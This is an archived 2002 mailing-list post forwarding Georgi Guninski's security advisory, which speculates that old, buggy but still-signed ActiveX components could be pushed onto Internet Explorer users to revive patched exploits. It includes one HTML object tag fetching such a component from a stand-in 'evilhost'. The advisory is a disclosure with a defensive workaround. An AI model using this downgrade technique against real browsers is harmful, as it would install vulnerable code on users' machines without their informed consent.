Digitally signing buggy ActiveX components
Giovanni Coppa
giannicoppa@yahoo.it
Gio 14 Feb 2002 19:26:45 CET
> Digitally signing buggy ActiveX components
>
> Date: 14 February 2002
>
> Disclaimer:
>
> This is just an unverified suspicion. I don't claim
> this information is true.
>
> The opinions expressed in this advisory and program
> are my own and
> not of any company. The usual standard disclaimer
> applies,
> especially the fact that Georgi Guninski is not
> liable for any damages
> caused by direct or indirect use of the information
> or functionality
> provided by this advisory or program. Georgi
> Guninski bears no
> responsibility for content or misuse of this
> advisory or program or
> any derivatives thereof.
>
> Description:
>
> Back in 1999 Juan Carlos Garcia Cuartango
> <cuartangojc@MX3.REDESTB.ES> made an
> excellent point at:
>
http://archives.neohapsis.com/archives/ntbugtraq/1998-1999/msg00422.html
> -------------------
> 3- Even if Microsoft fixes the hole the hole could
> exist forever. Why ?
> As far as I know this is the first time a hole is
> "SIGNED".
> MS has released an "dhtmed.cab" file as an ActiveX
> component signed by Microsoft
> -------------------
>
> Here is more on this.
>
> ActiveX in internet explorer allows downloading from
> the web and installing
> signed components (native code) on the user
> computer.
>
> As history shows a lot of ActiveX components are
> buggy and new version is
> released. The interesting part is the buggy version
> is still really signed and
> available in one form or another.
>
> A pure hypothethical scenario is to try to install
> the old buggy signed version
> if the user don't have it or on top of the patched
> one.
> Basically this is done this way:
> --------------------
> <object
> codebase="http://evilhost/buggyreallysigned.file"
> classid="clsid:speciallycrafted">
> </object>
> --------------------
> So, I wonder whether doing such mischief may lead to
> old exploits start
> working?
>
> Workaround/Solution:
> Don't know whether this is a real threat, this is
> just a suspicion.
> Anyway, to prevent such stuff, in internet explorer
> security options
> disable everything that contains "active".
> Or at least if you see a prompt "...This is
> digitally signed by X..."
> think do you really trust X having in mind his
> security record.
>
> Regards,
> Georgi Guninski
> http://www.guninski.com
______________________________________________________________________
Dillo con una cartolina!
http://it.greetings.yahoo.com/
Maggiori informazioni sulla lista
lugischia